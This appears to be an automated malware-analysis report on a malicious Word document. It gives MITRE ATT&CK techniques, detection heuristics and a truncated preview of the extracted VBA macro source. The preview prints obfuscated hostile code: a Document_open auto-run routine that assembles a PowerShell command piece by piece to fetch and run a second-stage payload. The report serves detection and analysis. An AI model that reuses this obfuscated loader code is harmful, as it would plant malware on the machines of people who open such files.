MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro that uses the Shell() function to execute arbitrary code. This indicates an attempt to download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Valyria-6874635-0' further supports its malicious nature. The embedded URL, though benign, is noted.
Heuristics (6)
- ClamAV: Doc.Malware.Valyria-6874635-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6874635-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37369 bytes |

macros.bas SHA-256: 25186a0c259c9cda7e1c3a7a62f78812e95f44fac8a4d50c858462071c5a9585

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "pFfKJJJJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
JhWon = 68574 - bjnSd * 87135 - 28607 * (EcQffc + bIFhAq * vsOlV / 14826 - 24044 / KKHGS)
msjqoN = 53582 - nwmSG * 28128 - 66296 * (jTZnv + rYHRo * FXZKB / 61856 - 42211 / wJBoT)
zzrcfY = 83579 - OWvWPK * 25475 - 53090 * (FJUzL + NjQunw * rQuYjF / 42055 - 54449 / TSDTS)
vPkKR = 88061 - HSBnX * 20168 - 27968 * (jiufd + ECSKSm * PSHSap / 92761 - 94289 / wGmEzi)
iWfnOn = 45226 - KkrMSz * 97569 - 14095 * (rAtUz + STBln * YjZGmb / 92466 - 14060 / BfkmQF)
lUGdC = 79178 - LmqBz * 74290 - 33710 * (joNoZi + JrMSH * jJGzz / 38936 - 12824 / tEzVRL)
RsOphXcFS = Application.Run("HtfwfZzt", "" + jpGBbEYmsBAhA + WZKzPXcRZsUG + uvSRq + LdQRMubi + wHfkHiCLl + TMBjnlAR)
aNDazY = 41234 - FhIFt * 2298 - 84194 * (jCLYG + PbhaL * KzkHut / 28147 - 30897 / XjfSai)
ZTPRkt = 5672 - adZzbt * 44602 - 24843 * (sHwAKA + bLLVfG * WYiIHv / 39991 - 50751 / hjTQp)
XCAXqV = 18348 - jPNjlo * 62106 - 25211 * (cvDapu + dpdAwi * odkZE / 60180 - 25455 / JtdFm)
End Sub
Attribute VB_Name = "iJSjhXuvOT"
Function uvSRq()
On Error Resume Next
wjbrEm = 53734 * 61438 / 79346 / TpcYp - 36625 - 52043 * 88835 * GMrlpk / CIKnYi - 9443 - zHimSI - 11004
CIRDH = TqHjD / woGiXu + (phQThZ / vICiB)
JqGwfVwzR = "" + zszjFpboBsZGul + jTVBuokmYho + Chr(112) + rACzoprhWCU + dMPsNtisYloq + "o" + HKHYBnNK + GGvPtMRAqJ + "w" + WfUuKiSOOJ + kWOdTYXSUrm + "e" + OzMTnztAjnbEGc + dJwVRfWwohRms + "r" + tNwvjGuaKqd + nZMvsariplfj + "s" + fGhGHjIiq + vliimioioKPV + "h" + RLwEcQMGsPUckV + FiCOzpJzCG + "e" + oDQkLMq + dOtVpsSN + "l" + SJOFjSIzcCwBWZ + pzjQXfANb + "l" + sIzqlsLZ + zjSDPORPbrU + " " + DTitXmJAiM + pfLKJLzMr + " " + RMIRizzco + tXHwnmlZTWIo + Chr(40) + GFSjUBfLDMhO + DikVlElnCKX + "N"
zKzpBI = 99238 * 4469 / 37898 / twwPw - 69689 - 12781 * 44112 * MkJqZ / MBrwJs - 17610 - iNLrwl - 89647
SYsJYi = 66207 * 54830 / 85747 / vTcEiU - 91266 - 33715 * 48283 * LWomm / VzSCH - 18599 - bNmKC - 16111
QLKVjLqGaV = "" + vOLKLRBEfmTCnU + oGIFKOk + "E" + CksJlaqoL + ZCpavFMW + "w" + ZrUtwnNqoji + JjJuuLcNcZMdm + "-" + KEBNjqctYQpn + WOhTJjtlLSKvOw + "O" + PJWjfjiQ + hmkdEYz + "B" + KiJdknY + DkcfbQBfQwTn + "j" + uIzHBhNlv + HdFjlsHpvNoYB + "E" + cZHCvSaOPV + XMVRpdpUmvw + "c" + MzpDGjz + EodsEXjPqLz + "t" + cZvzvMphjadw + lKIlojrHhn + " " + RoXFnfscUP + nlGwXNAu + "S" + vFhZLcs + IDWuBKbnwFGAV + "y"
BRfIr = 6596 * 50100 / 59008 / WBwDzh - 22504 - 45200 * 7834 * sjMqNT / slKRj - 28043 - dCzLww - 86282
wCcsk = 36842 * 73943 / 2873 / PsSYN - 37298 - 31797 * 69299 * XzERqF / waCpOB - 49564 - fbJzA - 71065
OAFsBjTCp = "" + rAbzhuzbwzjmpb + bKoUXmmzavhAa + "S" + sLMwNrQLrMpnRR + XsHUiMDcE + "T" + ZmMwBoCoacc + LzwHiwVhjiJHTm + "E" + HkuzPrZiQoz + PkunJJiPwtF + "m" + pDCphBpITsiFiT + ruzGETzOT + "." + iQLqoHVBVba + ZUwsMiapHzFzGm + "I" + GnVWXLsHBu + RFqQnBjk + "O" + CljnWSG + UjfOnFjZObpr + "." + NYCGoMEGEzBl + koZBJMijmqDLD + "c" + IhNlCWPTM + dObfNCVwpaB + "o" + FFhlLDdIdowS + hRUUNji + "m" + FHdApGmrH + fzpiHIoWzZf + "P" + CofUFnECVpb + CnCrzoYGUkcq + "r"
YHKQsB = (siRVE + YbonEj * HKmTd * ooEmRk * (ukUEa / 90981 - jvswNB * rWizpB + 35887 * OVrmwN - 50773 * wAkBvn))
vHjpZ = (CwBaRm + pdKHN * YFAUI * qoTiDD * (siIulz / 4448 - jElbZL * jdJcO + 81781 * zunbNi - 11696 * QzWntk))
HQBhtEzAQi = "" + IlhLSqFcC + WmbjkTWwM + "e" + kFHvvczwDPzmjP + wflKtQIRJ + "S" + RcRHXZJ + EWuddEsBYAu + "S" + DZTbdFUzqlXbhW + aNXOJLal + "i" + pXHsJihSYsow + jiOkXBv + "o" + twnXEprz + wPwpzcstP + "N" + TdRSiizpOGlHQN + HccjtGdwpj + "." + IiIjkNZUV + LuJTMLHfcD + "D" + QmQANASdwqjh + FXDnZBCGRmjmRn + "E" + MMDtrtT + UDbXUOck + "F" + jboiEjK + QajiwudTiqH + "L" + qaFwaiw + CDizcXiw + "a" + ZovmkYfcruz + tflNZGI + "T" + GJXjwwSGlf + mQuoUZvGFdJ + "e" + pSrJIsCEBhmOEc + kISNfGOq + "S"
jMVSc = (OiHfbw + miWliI * QzOvU * rwRiD * (kEMpj
... (truncated)